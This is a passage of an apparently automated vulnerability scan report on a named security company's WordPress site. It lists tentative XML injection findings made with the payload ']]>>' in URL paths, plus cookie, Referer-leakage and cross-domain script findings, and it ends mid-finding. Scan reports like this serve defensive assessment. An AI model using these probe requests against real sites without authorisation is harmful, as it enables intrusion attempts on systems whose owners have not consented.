HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:36:11 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:36:20 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27813 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.86. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/custom.js [REST URL parameter 4] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/themes/elite |
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/themes/elite Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:58:29 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:58:41 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27813 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.87. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/custom.js [REST URL parameter 5] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/themes/elite |
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/themes/elite Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:16:46 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:17:01 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27813 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.88. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/jquery.js [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/themes/elite |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content]]>>/themes/elite-force/js Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 07:54:43 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 07:54:47 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27813 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.89. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/jquery.js [REST URL parameter 2] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/themes/elite |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/themes]]>>/elite-force/js/jquery.js HTTP/1.1 Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:23:23 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:23:34 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27813 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.90. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/jquery.js [REST URL parameter 3] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/themes/elite |
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/themes/elite Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:39:00 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:39:18 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27813 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.91. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/jquery.js [REST URL parameter 4] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/themes/elite |
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/themes/elite Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:57:15 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:58:00 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27813 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.92. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/jquery.js [REST URL parameter 5] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/themes/elite |
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/themes/elite Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:21:25 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:21:32 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27813 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.93. http://www.ligattsecurity.com/wp-content/uploads/shadowbox-js/ed1004eebc5bab68f0d54754e141ca1a.js [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/uploads |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content]]>>/uploads/shadowbox-js Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 10:15:35 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 10:15:47 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27838 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.94. http://www.ligattsecurity.com/wp-includes/js/swfobject.js [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-includes/js/swfobject |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-includes]]>>/js/swfobject.js HTTP/1.1 Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:37:46 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:38:35 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27798 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
4. Cookie without HttpOnly flag set previous next
Summary
Severity: | Low |
Confidence: | Firm |
Host: | http://www.ligattsecurity |
Path: | / |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- PHPSESSID=sim60iit4i
m0bv0a6hr2c5hdv1; path=/ - Apache=173.193.214.243
.1296574377227827; path=/; expires=Tue, 08-Mar-11 15:32:57 GMT
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
Request
GET / HTTP/1.1 Host: www.ligattsecurity.com Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 15:32:57 GMT Server: Apache/2.2.9 (Fedora) Set-Cookie: Apache=173.193.214.243 Set-Cookie: PHPSESSID=sim60iit4i Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 36616 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... |
5. Cross-domain Referer leakage previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The page was loaded from a URL containing a query string:- http://www.ligattsecurity
.com/wp-content/plugins /wp-prettyphoto/js/jquery .prettyPhoto.js?ver=2.5.6
- http://www.apple.com
/qtactivex/qtplugin.cab
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.Request
GET /wp-content/plugins/wp Host: www.ligattsecurity.com Proxy-Connection: keep-alive Referer: http://www.ligattsecurity Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 15:33:02 GMT Server: Apache/2.2.9 (Fedora) Last-Modified: Sat, 14 Aug 2010 02:41:03 GMT ETag: "7b4573-41d3-48dbf87 Accept-Ranges: bytes Content-Length: 16851 Connection: close Content-Type: application/x-javascript /* ------------------------- * Class: prettyPhoto * Use: Lightbox clone for jQuery * Author: Stephane Caron (http://www.no-margin-for ...[SNIP]... </object>',quicktime ...[SNIP]... |
6. Cross-domain script include previous next
There are 11 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.6.1. http://www.ligattsecurity.com/ previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ligattsecurity |
Path: | / |
Issue detail
The response dynamically includes the following scripts from other domains:- http://lite.piclens.com
/current/piclens _optimized.js - http://www.stocktrader
.org.uk/remote2/ST1-
Request
GET / HTTP/1.1 Host: www.ligattsecurity.com Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 15:32:57 GMT Server: Apache/2.2.9 (Fedora) Set-Cookie: Apache=173.193.214.243 Set-Cookie: PHPSESSID=sim60iit4i Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 36616 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... <!-- NextGeEN Gallery CoolIris/PicLens support --> <script type="text/javascript" src="http://lite.piclens ...[SNIP]... </script> <script type="text/javascript" src="http://www 1.php"> ...[SNIP]... |
6.2. http://www.ligattsecurity.com/:nolink previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ligattsecurity |
Path: | /:nolink |
Issue detail
The response dynamically includes the following scripts from other domains:- http://lite.piclens.com
/current/piclens _optimized.js - http://www.stocktrader
.org.uk/remote2/ST1-
Request
GET /:nolink HTTP/1.1 Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Tue, 01 Feb 2011 16:10:53 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Tue, 01 Feb 2011 16:10:59 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28194 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <!-- NextGeEN Gallery CoolIris/PicLens support --> <script type="text/javascript" src="http://lite.piclens ...[SNIP]... </script> <script type="text/javascript" src="http://www 1.php"> ...[SNIP]... |
6.3. http://www.ligattsecurity.com/about-us previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ligattsecurity |
Path: | /about-us |
Issue detail
The response dynamically includes the following scripts from other domains:- http://lite.piclens.com
/current/piclens _optimized.js - http://www.stocktrader
.org.uk/remote2/ST1-
Request
GET /about-us HTTP/1.1 Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 16:11:54 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 32653 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <ti ...[SNIP]... <!-- NextGeEN Gallery CoolIris/PicLens support --> <script type="text/javascript" src="http://lite.piclens ...[SNIP]... </script> <script type="text/javascript" src="http://www 1.php"> ...[SNIP]... |
6.4. http://www.ligattsecurity.com/commercials previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ligattsecurity |
Path: | /commercials |
Issue detail
The response dynamically includes the following scripts from other domains:- http://lite.piclens.com
/current/piclens _optimized.js - http://www.stocktrader
.org.uk/remote2/ST1-
Request
GET /commercials HTTP/1.1 Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 16:12:52 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 31284 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <ti ...[SNIP]... <!-- NextGeEN Gallery CoolIris/PicLens support --> <script type="text/javascript" src="http://lite.piclens ...[SNIP]... </script> <script type="text/javascript" src="http://www 1.php"> ...[SNIP]... </script> <script type="text/javascript" src="http://www 1.php"> ...[SNIP]... |
6.5. http://www.ligattsecurity.com/font.swf previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ligattsecurity |
Path: | /font.swf |
Issue detail
The response dynamically includes the following scripts from other domains:- http://lite.piclens.com
/current/piclens _optimized.js - http://www.stocktrader
.org.uk/remote2/ST1-
Request
GET /font.swf HTTP/1.1 Host: www.ligattsecurity.com Proxy-Connection: keep-alive Referer: http://www.ligattsecurity Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Tue, 01 Feb 2011 15:33:05 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Tue, 01 Feb 2011 15:33:07 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28195 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <!-- NextGeEN Gallery CoolIris/PicLens support --> <script type="text/javascript" src="http://lite.piclens ...[SNIP]... </script> <script type="text/javascript" src="http://www 1.php"> ...[SNIP]... |
6.6. http://www.ligattsecurity.com/ligatt-security/wp-admin previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ligattsecurity |
Path: | /ligatt-security/wp-admin |
Issue detail
The response dynamically includes the following scripts from other domains:- http://lite.piclens.com
/current/piclens _optimized.js - http://www.stocktrader
.org.uk/remote2/ST1-
Request
GET /ligatt-security/wp-admin HTTP/1.1 Host: www.ligattsecurity.com Proxy-Connection: keep-alive Referer: http://www.ligattsecurity Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Tue, 01 Feb 2011 15:33:47 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Tue, 01 Feb 2011 15:33:48 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28211 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <!-- NextGeEN Gallery CoolIris/PicLens support --> <script type="text/javascript" src="http://lite.piclens ...[SNIP]... </script> <script type="text/javascript" src="http://www 1.php"> ...[SNIP]... |
6.7. http://www.ligattsecurity.com/solutions previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ligattsecurity |
Path: | /solutions |
Issue detail
The response dynamically includes the following scripts from other domains:- http://lite.piclens.com
/current/piclens _optimized.js - http://www.stocktrader
.org.uk/remote2/ST1-
Request
GET /solutions HTTP/1.1 Host: www.ligattsecurity.com Proxy-Connection: keep-alive Referer: http://www.ligattsecurity Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 15:33:12 GMT Server: Apache/2.2.9 (Fedora) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53585 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <ti ...[SNIP]... <!-- NextGeEN Gallery CoolIris/PicLens support --> <script type="text/javascript" src="http://lite.piclens ...[SNIP]... </script> <script type="text/javascript" src="http://www 1.php"> ...[SNIP]... |
6.8. http://www.ligattsecurity.com/solutions/am-i-hacker-proof previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.ligattsecurity |
Path: | /solutions/am-i-hacker |
Issue detail
The response dynamically includes the following scripts from other domains:- http://lite.piclens.com
/current/piclens _optimized.js - http://www.stocktrader
.org.uk/remote2/ST1-
Request
GET /solutions/am-i-hacker Host: www.ligattsecurity.com Proxy-Connection: keep-alive Referer: http://www.ligattsecurity Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Apache=173.193.214.243 |
Response
